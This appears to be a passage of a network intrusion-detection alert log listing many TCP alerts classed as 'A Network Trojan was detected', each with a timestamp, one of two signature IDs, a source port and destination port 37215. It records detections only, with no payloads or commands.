          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157318
          SID:2829579
          Source Port:39096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930369
          SID:2829579
          Source Port:43800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948587
          SID:2829579
          Source Port:53172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950005
          SID:2829579
          Source Port:38350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132008
          SID:2835222
          Source Port:56968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721307
          SID:2829579
          Source Port:40600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653506
          SID:2835222
          Source Port:40136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823516
          SID:2835222
          Source Port:53072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994459
          SID:2829579
          Source Port:44552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033467
          SID:2829579
          Source Port:38592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718079
          SID:2829579
          Source Port:57282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539263
          SID:2829579
          Source Port:56136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564421
          SID:2829579
          Source Port:53644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473621
          SID:2835222
          Source Port:45420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646276
          SID:2835222
          Source Port:42730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948367
          SID:2835222
          Source Port:34400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.636018
          SID:2835222
          Source Port:43362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076317
          SID:2835222
          Source Port:33498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718509
          SID:2829579
          Source Port:58050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412992
          SID:2829579
          Source Port:57290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909861
          SID:2835222
          Source Port:41836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029637
          SID:2835222
          Source Port:60202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077557
          SID:2835222
          Source Port:51654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166517
          SID:2835222
          Source Port:37986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028469
          SID:2829579
          Source Port:37968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922029
          SID:2829579
          Source Port:60454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103594
          SID:2829579
          Source Port:37046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998529
          SID:2835222
          Source Port:44382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645654
          SID:2829579
          Source Port:43700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.075547
          SID:2829579
          Source Port:45212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.137920
          SID:2829579
          Source Port:48818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677122
          SID:2829579
          Source Port:40306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243931
          SID:2835222
          Source Port:38968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475891
          SID:2835222
          Source Port:43476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595933
          SID:2829579
          Source Port:42056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163289
          SID:2829579
          Source Port:55972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286141
          SID:2829579
          Source Port:36322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272293
          SID:2835222
          Source Port:43784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168862
          SID:2829579
          Source Port:53240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716909
          SID:2829579
          Source Port:58920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993733
          SID:2829579
          Source Port:52492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283634
          SID:2829579
          Source Port:42876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598477
          SID:2829579
          Source Port:38354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205155
          SID:2829579
          Source Port:56258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476637
          SID:2829579
          Source Port:44518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399452
          SID:2829579
          Source Port:43880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035623
          SID:2829579
          Source Port:60766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033197
          SID:2829579
          Source Port:36370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166067
          SID:2829579
          Source Port:50484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226761
          SID:2829579
          Source Port:43656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719065
          SID:2835222
          Source Port:32944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819721
          SID:2829579
          Source Port:38286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658692
          SID:2829579
          Source Port:40896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288095
          SID:2835222
          Source Port:32792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283652
          SID:2835222
          Source Port:47614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223988
          SID:2829579
          Source Port:45812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.420150
          SID:2835222
          Source Port:35020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033465
          SID:2829579
          Source Port:36224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120639
          SID:2835222
          Source Port:48898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985432
          SID:2835222
          Source Port:57550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713541
          SID:2835222
          Source Port:53800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289027
          SID:2835222
          Source Port:59706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415946
          SID:2829579
          Source Port:40216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245393
          SID:2829579
          Source Port:45572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167690
          SID:2835222
          Source Port:49608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163984
          SID:2829579
          Source Port:38542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929532
          SID:2835222
          Source Port:32790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082792
          SID:2829579
          Source Port:43288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719729
          SID:2835222
          Source Port:46306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225563
          SID:2835222
          Source Port:33192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947551
          SID:2835222
          Source Port:54094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120536
          SID:2835222
          Source Port:58738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412417
          SID:2835222
          Source Port:46170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226943
          SID:2835222
          Source Port:44054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167223
          SID:2829579
          Source Port:36714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166547
          SID:2835222
          Source Port:58202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643495
          SID:2829579
          Source Port:41754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914728
          SID:2835222
          Source Port:34136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164027
          SID:2835222
          Source Port:43742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819061
          SID:2835222
          Source Port:36992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897770
          SID:2829579
          Source Port:44472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397216
          SID:2829579
          Source Port:47612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719991
          SID:2829579
          Source Port:43646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041422
          SID:2829579
          Source Port:50178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990084
          SID:2829579
          Source Port:41600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274311
          SID:2835222
          Source Port:36422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993371
          SID:2829579
          Source Port:42256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569292
          SID:2829579
          Source Port:36630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557443
          SID:2829579
          Source Port:48434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.088349
          SID:2835222
          Source Port:40546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105380
          SID:2835222
          Source Port:45868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076693
          SID:2835222
          Source Port:58376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471452
          SID:2829579
          Source Port:53814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.229960
          SID:2829579
          Source Port:54044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168779
          SID:2829579
          Source Port:47752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119805
          SID:2835222
          Source Port:59228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818150
          SID:2829579
          Source Port:59014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538864
          SID:2829579
          Source Port:54716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282456
          SID:2835222
          Source Port:39598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922237
          SID:2835222
          Source Port:46986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996281
          SID:2835222
          Source Port:41708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081044
          SID:2829579
          Source Port:41330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.078430
          SID:2835222
          Source Port:42672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952350
          SID:2835222
          Source Port:44830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014984
          SID:2829579
          Source Port:55378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306164
          SID:2829579
          Source Port:59304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537802
          SID:2829579
          Source Port:38126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283085
          SID:2835222
          Source Port:32788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988214
          SID:2829579
          Source Port:58220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208203
          SID:2835222
          Source Port:41932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928792
          SID:2829579
          Source Port:39358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822101
          SID:2829579
          Source Port:59874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208182
          SID:2835222
          Source Port:45302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923028
          SID:2829579
          Source Port:57614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287995
          SID:2829579
          Source Port:41232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719222
          SID:2835222
          Source Port:43604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206972
          SID:2829579
          Source Port:43940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397211
          SID:2829579
          Source Port:44254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283367
          SID:2835222
          Source Port:42358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928182
          SID:2835222
          Source Port:46044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166346
          SID:2829579
          Source Port:48462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163120
          SID:2835222
          Source Port:52170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478123
          SID:2835222
          Source Port:44572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869328
          SID:2835222
          Source Port:53926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287108
          SID:2829579
          Source Port:38122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819737
          SID:2829579
          Source Port:43320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396756
          SID:2829579
          Source Port:34652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468856
          SID:2829579
          Source Port:48634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166757
          SID:2829579
          Source Port:55432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250660
          SID:2835222
          Source Port:60546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860390
          SID:2829579
          Source Port:34416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867952
          SID:2835222
          Source Port:56234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667989
          SID:2835222
          Source Port:41858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719712
          SID:2835222
          Source Port:46708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226349
          SID:2829579
          Source Port:39088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904534
          SID:2829579
          Source Port:38930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.984308
          SID:2829579
          Source Port:33560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985225
          SID:2835222
          Source Port:37118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469403
          SID:2829579
          Source Port:53692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244244
          SID:2835222
          Source Port:53942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078780
          SID:2829579
          Source Port:57690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715371
          SID:2829579
          Source Port:47306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718673
          SID:2835222
          Source Port:53426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566097
          SID:2835222
          Source Port:35976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077016
          SID:2835222
          Source Port:49382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605687
          SID:2829579
          Source Port:52326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300939
          SID:2829579
          Source Port:47828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921099
          SID:2829579
          Source Port:39856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606783
          SID:2829579
          Source Port:47488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862620
          SID:2835222
          Source Port:37640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230899
          SID:2829579
          Source Port:47520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562181
          SID:2835222
          Source Port:34848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818263
          SID:2829579
          Source Port:51916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242627
          SID:2829579
          Source Port:56826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919166
          SID:2835222
          Source Port:39486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249608
          SID:2829579
          Source Port:55462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032915
          SID:2835222
          Source Port:34594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714430
          SID:2829579
          Source Port:33038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399746
          SID:2829579
          Source Port:36722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104753
          SID:2829579
          Source Port:42804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078731
          SID:2829579
          Source Port:45180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287983
          SID:2835222
          Source Port:36074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244280
          SID:2829579
          Source Port:45582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719637
          SID:2835222
          Source Port:57964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947939
          SID:2835222
          Source Port:50804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158333
          SID:2829579
          Source Port:50956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226562
          SID:2829579
          Source Port:52612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539358
          SID:2829579
          Source Port:36270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.293950
          SID:2829579
          Source Port:57888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900356
          SID:2829579
          Source Port:35472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225405
          SID:2835222
          Source Port:44392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.983386
          SID:2829579
          Source Port:35636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252424
          SID:2829579
          Source Port:38022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719666
          SID:2835222
          Source Port:54154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208259
          SID:2829579
          Source Port:54578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.097492
          SID:2829579
          Source Port:46408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915890
          SID:2829579
          Source Port:48462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033914
          SID:2829579
          Source Port:46648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.003578
          SID:2835222
          Source Port:56744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.859268
          SID:2829579
          Source Port:36952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557291
          SID:2835222
          Source Port:47226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946276
          SID:2835222
          Source Port:47720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029879
          SID:2829579
          Source Port:43982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539225
          SID:2835222
          Source Port:33076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993716
          SID:2835222
          Source Port:59634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103331
          SID:2829579
          Source Port:35250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014944
          SID:2829579
          Source Port:32946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820147
          SID:2835222
          Source Port:39614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036161
          SID:2829579
          Source Port:52472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993671
          SID:2829579
          Source Port:54688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538316
          SID:2835222
          Source Port:41194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132240
          SID:2829579
          Source Port:58344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.690073
          SID:2829579
          Source Port:41964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539412
          SID:2829579
          Source Port:33244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246707
          SID:2829579
          Source Port:41826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539181
          SID:2835222
          Source Port:57130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288980
          SID:2835222
          Source Port:45856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
